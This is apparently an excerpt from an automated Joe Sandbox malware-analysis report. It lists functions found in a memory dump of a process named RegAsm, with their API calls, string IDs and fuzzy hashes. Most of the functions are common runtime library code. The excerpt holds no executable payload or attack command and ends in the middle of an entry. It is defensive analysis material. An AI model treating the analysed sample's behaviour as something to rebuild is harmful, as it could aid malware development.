                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9C18BB19002099FDB24DFA4C849BFEBFF4BB5A308F14445DE54AA7281EB749A49CF50
                                                                                                                                                                                                                                  Function 00546CDF Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 131COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DName::operator+.LIBCMT ref: 00546D12
                                                                                                                                                                                                                                    • Part of subcall function 005444B8: DName::operator+=.LIBCMT ref: 005444CE
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Name::operator+Name::operator+=
                                                                                                                                                                                                                                  • String ID: \V$\V$`unknown ecsu'$class $coclass $cointerface $enum $struct $union
                                                                                                                                                                                                                                  • API String ID: 382699925-3114403028
                                                                                                                                                                                                                                  • Opcode ID: 44d04b42bd7f64a9fbdc2a737b1503d7bc291e2cb923117d01b19c19c51f0a78
                                                                                                                                                                                                                                  • Instruction ID: f35742d8d0e59c2c47aff01cf31279159e0d27da270b69ac7e3e9786b4597088
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 44d04b42bd7f64a9fbdc2a737b1503d7bc291e2cb923117d01b19c19c51f0a78
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D415BB5D0020ADBCF04DFA8D989BEEBFF8BB46308F104519E505A7241D7719A88DB92
                                                                                                                                                                                                                                  Function 005472C9 Relevance: 19.8, APIs: 13, Instructions: 332COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Name::operator+$NameName::$Decorator::getReturnTypeoperator+
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2932655852-0
                                                                                                                                                                                                                                  • Opcode ID: 051f2e2ec0fc0c73c736bc1839f58056cbca688b00fb25940a8b68e4ded01730
                                                                                                                                                                                                                                  • Instruction ID: 000a7de5a9f062fbf30602ca6b2b18ce2aaaf6586bb93537d5f4f5eeda67c721
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 051f2e2ec0fc0c73c736bc1839f58056cbca688b00fb25940a8b68e4ded01730
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1EC172B1904209AFCF14DFA8D896AFE7FB8FB5D308F100569F506A7291EB309A45DB50
                                                                                                                                                                                                                                  Function 0054A0F8 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 185COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • Replicator::operator[].LIBCMT ref: 0054A135
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Replicator::operator[]
                                                                                                                                                                                                                                  • String ID: @$`generic-type-$`template-parameter-$generic-type-$template-parameter-
                                                                                                                                                                                                                                  • API String ID: 3676697650-3433397351
                                                                                                                                                                                                                                  • Opcode ID: 660f987c135bd54bbdf5e96d1fe35c0d55838b59f44e33779990b02873a96446
                                                                                                                                                                                                                                  • Instruction ID: 65a89cd21b710b857e180ea9b56b32140d1b1376361f3798b4feb2f2ae664960
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 660f987c135bd54bbdf5e96d1fe35c0d55838b59f44e33779990b02873a96446
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F261C075D442099FDB00DFA4D849BEEBFB8BF59308F104429EA01B7291DB749909DB91
                                                                                                                                                                                                                                  Function 0054824A Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 178COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: operator+shared_ptr$NameName::
                                                                                                                                                                                                                                  • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
                                                                                                                                                                                                                                  • API String ID: 2894330373-757766384
                                                                                                                                                                                                                                  • Opcode ID: 62c78a45a311e9d8c39e42b8bd332dbeb8d5bd46d5e0723c7f87cedc83f0bd37
                                                                                                                                                                                                                                  • Instruction ID: 73f3193a950c44e03eb166a4d69024b4788f275710193067aed13150d85364f4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 62c78a45a311e9d8c39e42b8bd332dbeb8d5bd46d5e0723c7f87cedc83f0bd37
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1C619A7480410AEECB14DF68CC489FE7FB4FB4970CF048A6AE855AB211DB759645DF90
                                                                                                                                                                                                                                  Function 00548498 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 113COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: operator+$Name::operator+
                                                                                                                                                                                                                                  • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                                                                                                                                                                                                                  • API String ID: 1198235884-2239912363
                                                                                                                                                                                                                                  • Opcode ID: f8e0ba3558774e3a242d122333246f3809362ad6e8eb574fc22014946d50ec2d
                                                                                                                                                                                                                                  • Instruction ID: 7c7e5bff818a941dcfe79e601a5e8e31d70bfacc444b7772a10236a8f879a01f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f8e0ba3558774e3a242d122333246f3809362ad6e8eb574fc22014946d50ec2d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AD4111B0904209AFDF10DF94D849BFE7FF5BB05318F048859EA15AB251DBB49A48DF80
                                                                                                                                                                                                                                  Function 00545826 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 151COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DName::operator+.LIBCMT ref: 005458B4
                                                                                                                                                                                                                                  • DName::operator+.LIBCMT ref: 00545907
                                                                                                                                                                                                                                    • Part of subcall function 005444DA: shared_ptr.LIBCMT ref: 005444F6
                                                                                                                                                                                                                                    • Part of subcall function 00544405: DName::operator+.LIBCMT ref: 00544426
                                                                                                                                                                                                                                  • DName::operator+.LIBCMT ref: 005458F8
                                                                                                                                                                                                                                  • DName::operator+.LIBCMT ref: 00545958
                                                                                                                                                                                                                                  • DName::operator+.LIBCMT ref: 00545965
                                                                                                                                                                                                                                  • DName::operator+.LIBCMT ref: 005459AC
                                                                                                                                                                                                                                  • DName::operator+.LIBCMT ref: 005459B9
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Name::operator+$shared_ptr
                                                                                                                                                                                                                                  • String ID: HV
                                                                                                                                                                                                                                  • API String ID: 1037112749-1037838562
                                                                                                                                                                                                                                  • Opcode ID: 1c3b66cf4e4e30fde5248420b985507d24960887c4dae321197c1bbce77a81d2
                                                                                                                                                                                                                                  • Instruction ID: 108bcb62c00516556a76b7d2b0d91d07d1d1761b4f47007b49a6be26a047f238
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c3b66cf4e4e30fde5248420b985507d24960887c4dae321197c1bbce77a81d2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 945190B1900619EBDF05DBA4C849FEEBFB8FB48714F144419F602A7181EB349A44CBA0
                                                                                                                                                                                                                                  Function 00566B03 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0056646F), ref: 00566B1C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DecodePointer
                                                                                                                                                                                                                                  • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                                                                  • API String ID: 3527080286-3064271455
                                                                                                                                                                                                                                  • Opcode ID: e4f2f05fd6a0abc3649a66b90c2f681f835bab45a522b097eb801e84404631cd
                                                                                                                                                                                                                                  • Instruction ID: 58fc13782c1a2441b6850707650057e27253402340535adaf62e712985e30948
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e4f2f05fd6a0abc3649a66b90c2f681f835bab45a522b097eb801e84404631cd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 25517774900E0ADBEB109F68E8881ADBFB4FB49304F104595E4C2A7264CB748E69EB59
                                                                                                                                                                                                                                  Function 00546E89 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 73COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: NameName::Name::operator+shared_ptr
                                                                                                                                                                                                                                  • String ID: char $int $long $short $unsigned
                                                                                                                                                                                                                                  • API String ID: 3919194733-3894466517
                                                                                                                                                                                                                                  • Opcode ID: 63fe147f499c64e451dcb104e9b6a140272a3779615e1466f6713bb81907b1c5
                                                                                                                                                                                                                                  • Instruction ID: 5dfba9cc13da80164562219bfc48040da0b8cee7c4c7da799e20225a4d46394f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 63fe147f499c64e451dcb104e9b6a140272a3779615e1466f6713bb81907b1c5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7212AB4D00249EFCB04CFA8D8997EEBFB4FB06309F008959E461A7295D7B59A48CF51
                                                                                                                                                                                                                                  Function 00540F60 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,0041F869,0041F86B,00000000,00000000,7A18E7C2,?,?,?,Function_001415D0,00589468,000000FE,?,0041F869,00000001), ref: 00540FE9
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,0041F869,?,00000000,00000000,?,Function_001415D0,00589468,000000FE,?,0041F869), ref: 00541064
                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 0054106F
                                                                                                                                                                                                                                  • _com_issue_error.COMSUPP ref: 00541098
                                                                                                                                                                                                                                  • _com_issue_error.COMSUPP ref: 005410A2
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(80070057,7A18E7C2,?,?,?,Function_001415D0,00589468,000000FE,?,0041F869,00000001), ref: 005410A7
                                                                                                                                                                                                                                  • _com_issue_error.COMSUPP ref: 005410BA
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,?,?,?,Function_001415D0,00589468,000000FE,?,0041F869,00000001), ref: 005410D0
                                                                                                                                                                                                                                  • _com_issue_error.COMSUPP ref: 005410E3
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1353541977-0
                                                                                                                                                                                                                                  • Opcode ID: 2fe2c51653d8cda91546c187e4437ef71e7e62000d21293260729d718a266f4c
                                                                                                                                                                                                                                  • Instruction ID: 3273c3d7c6ba730919ae7ead805ef241dc3f2e5e58777b6658a3f02201a3b698
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2fe2c51653d8cda91546c187e4437ef71e7e62000d21293260729d718a266f4c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B414971A00645ABDB10DF68DC49BEEBFA8FB44758F204239F909E7281D7759884CBA4
                                                                                                                                                                                                                                  Function 005681D0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 275COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __FindPESection.LIBCMT ref: 00568301
                                                                                                                                                                                                                                  • VirtualQuery.KERNEL32(83000000,7A18E7C2,0000001C,7A18E7C2,?,?,?), ref: 005683E6
                                                                                                                                                                                                                                  • __FindPESection.LIBCMT ref: 00568423
                                                                                                                                                                                                                                  • __FindPESection.LIBCMT ref: 0056845D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FindSection$QueryVirtual
                                                                                                                                                                                                                                  • String ID: < Y$< Y$< Y
                                                                                                                                                                                                                                  • API String ID: 2992484814-2098822819
                                                                                                                                                                                                                                  • Opcode ID: 3b793e36efddfdf0282e14faa0d2fbde381f196fff8897a5aeeb879d4427cb30
                                                                                                                                                                                                                                  • Instruction ID: 0c786a70bc05507d8cf3a2c5bdfa6f6d59f7082cdbc7ea77bdd947899ef05769
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b793e36efddfdf0282e14faa0d2fbde381f196fff8897a5aeeb879d4427cb30
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 43A1B075A00A1A9FCB20CF58D9847BDBBB8FB58720F15076AE819A7391DB31DC45CB90
                                                                                                                                                                                                                                  Function 00549FA4 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 119COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DName::operator+.LIBCMT ref: 00549FE8
                                                                                                                                                                                                                                  • DName::operator+.LIBCMT ref: 00549FF4
                                                                                                                                                                                                                                    • Part of subcall function 005444DA: shared_ptr.LIBCMT ref: 005444F6
                                                                                                                                                                                                                                  • DName::operator+=.LIBCMT ref: 0054A0B2
                                                                                                                                                                                                                                    • Part of subcall function 0054885E: DName::operator+.LIBCMT ref: 005488C9
                                                                                                                                                                                                                                    • Part of subcall function 0054885E: DName::operator+.LIBCMT ref: 00548B93
                                                                                                                                                                                                                                    • Part of subcall function 00544405: DName::operator+.LIBCMT ref: 00544426
                                                                                                                                                                                                                                  • DName::operator+.LIBCMT ref: 0054A06F
                                                                                                                                                                                                                                    • Part of subcall function 00544532: DName::operator=.LIBVCRUNTIME ref: 00544553
                                                                                                                                                                                                                                  • DName::DName.LIBVCRUNTIME ref: 0054A0D6
                                                                                                                                                                                                                                  • DName::operator+.LIBCMT ref: 0054A0E2
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Name::operator+$NameName::Name::operator+=Name::operator=shared_ptr
                                                                                                                                                                                                                                  • String ID: {for
                                                                                                                                                                                                                                  • API String ID: 2795783184-864106941
                                                                                                                                                                                                                                  • Opcode ID: bdbd1897dbe82126fc8655caad7fd300d3708f8b04b2bdd4b2af56ab052036d1
                                                                                                                                                                                                                                  • Instruction ID: 3819757beef3ac60148b6cdd210775a5acd7a301e286b7ddf90b1f29eef026ee
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bdbd1897dbe82126fc8655caad7fd300d3708f8b04b2bdd4b2af56ab052036d1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A041E4B0A80244AFDF14DFA8C859BEE7FF9BB4A304F404458E289EB281DB749D45CB51
                                                                                                                                                                                                                                  Function 0054560C Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 80COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 005454FF: Replicator::operator[].LIBCMT ref: 0054556B
                                                                                                                                                                                                                                  • DName::DName.LIBVCRUNTIME ref: 00545658
                                                                                                                                                                                                                                  • DName::operator+.LIBCMT ref: 0054569E
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: NameName::Name::operator+Replicator::operator[]
                                                                                                                                                                                                                                  • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                                                                                                                                                  • API String ID: 583996491-2211150622
                                                                                                                                                                                                                                  • Opcode ID: 387559c01c155620a9fd0e4bcd2e95fb6cbb8e81fc031162b26aa8a3a8eb7de6
                                                                                                                                                                                                                                  • Instruction ID: 22717dab220000f2b2fe5b9231030ba8d422ba255fa49f262cc73ca56132a8c7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 387559c01c155620a9fd0e4bcd2e95fb6cbb8e81fc031162b26aa8a3a8eb7de6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E313A70900609DFCB04DF98C8546EEBFF4FB09308F508559D656EB252E7749A08DF41
                                                                                                                                                                                                                                  Function 00419F50 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 75COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00419F62
                                                                                                                                                                                                                                  • int.LIBCPMTD ref: 00419F74
                                                                                                                                                                                                                                    • Part of subcall function 0040E500: std::_Lockit::_Lockit.LIBCPMT ref: 0040E516
                                                                                                                                                                                                                                    • Part of subcall function 0040E500: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E540
                                                                                                                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMTD ref: 00419FBB
                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0041A031
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                                                                                                                                                                                                  • String ID: zA$zA
                                                                                                                                                                                                                                  • API String ID: 3053331623-2891261629
                                                                                                                                                                                                                                  • Opcode ID: 64b8a471f0bbf50294b7c22394a367852c954cdf6a9aa49a91d3b8e7e4af76d4
                                                                                                                                                                                                                                  • Instruction ID: 53972e3499c9381113a31361ce457d97195298eb20028607f6c6d65a004869b6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 64b8a471f0bbf50294b7c22394a367852c954cdf6a9aa49a91d3b8e7e4af76d4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F31B2B4D00209EFCB04DF95D581AEEBBB1BF48304F10856AE815A7390EB34AE45CFA5
                                                                                                                                                                                                                                  Function 005094A0 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 338COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: !kcc$7$>
                                                                                                                                                                                                                                  • API String ID: 0-3074482854
                                                                                                                                                                                                                                  • Opcode ID: 29750111deb84b7588785617db08492fa461d3798ce80ec83168ceaa2c92d49a
                                                                                                                                                                                                                                  • Instruction ID: 1a053a08fb235a40f07a1a16a9561ee80e966d54d3274d9a8826d429f96d62fe
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 29750111deb84b7588785617db08492fa461d3798ce80ec83168ceaa2c92d49a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 75F14274D04248DFDB14CFA8C890BEEBBB2BF49304F1484A9D845AB386D735AA45CF60
                                                                                                                                                                                                                                  Function 0055C285 Relevance: 10.8, APIs: 7, Instructions: 329COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _strrchr
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3213747228-0
                                                                                                                                                                                                                                  • Opcode ID: f70da735b144380618cf4515d7c89395848c01acb3a287e63f8147dc8b992a0b
                                                                                                                                                                                                                                  • Instruction ID: a4d94c605d1a9f00be99a8e263be0421509704955c1c499ae9695e573385f7e4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f70da735b144380618cf4515d7c89395848c01acb3a287e63f8147dc8b992a0b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 40B15772A003569FDF118E68CCA1BBE7FA5FF59312F158556EC04AF382E274A905C7A0
                                                                                                                                                                                                                                  Function 00418CD0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 207COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _memcpy_s
                                                                                                                                                                                                                                  • String ID: Info$Salt
                                                                                                                                                                                                                                  • API String ID: 2001391462-2052181562
                                                                                                                                                                                                                                  • Opcode ID: 55f51af687f5ad04fc72ce6399350c1af516ab1c5759d67a421caf097d0f9614
                                                                                                                                                                                                                                  • Instruction ID: c264f8babf55e3121e48eae263ef24839df939fa8e29ab3a41309e630623033c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 55f51af687f5ad04fc72ce6399350c1af516ab1c5759d67a421caf097d0f9614
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1991C8B5E002089BCF18DF95D891AEEBBB5BF48700F20815EE519B7391DB34A941CF64
                                                                                                                                                                                                                                  Function 005415D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00541607
                                                                                                                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0054160F
                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00541698
                                                                                                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 005416C3
                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00541718
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                  • Opcode ID: a540b074671f36167dc129147950784cfae59cc2a7a1fa721ab5878aeb002676
                                                                                                                                                                                                                                  • Instruction ID: c68a64b44508398c878f129a5d3fe6c98b1eedbf56001cbea5a083c7032634fd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a540b074671f36167dc129147950784cfae59cc2a7a1fa721ab5878aeb002676
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A241E134A002099BCF10DF68C884AEEBFB5FF85328F188555E815AB352D731EA41CF96
                                                                                                                                                                                                                                  Function 0055B745 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,0041C3C8,?,7A18E7C2,?,0055B854,0041C3C8,0053EE88,00000000,0041C3C8), ref: 0055B806
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FreeLibrary
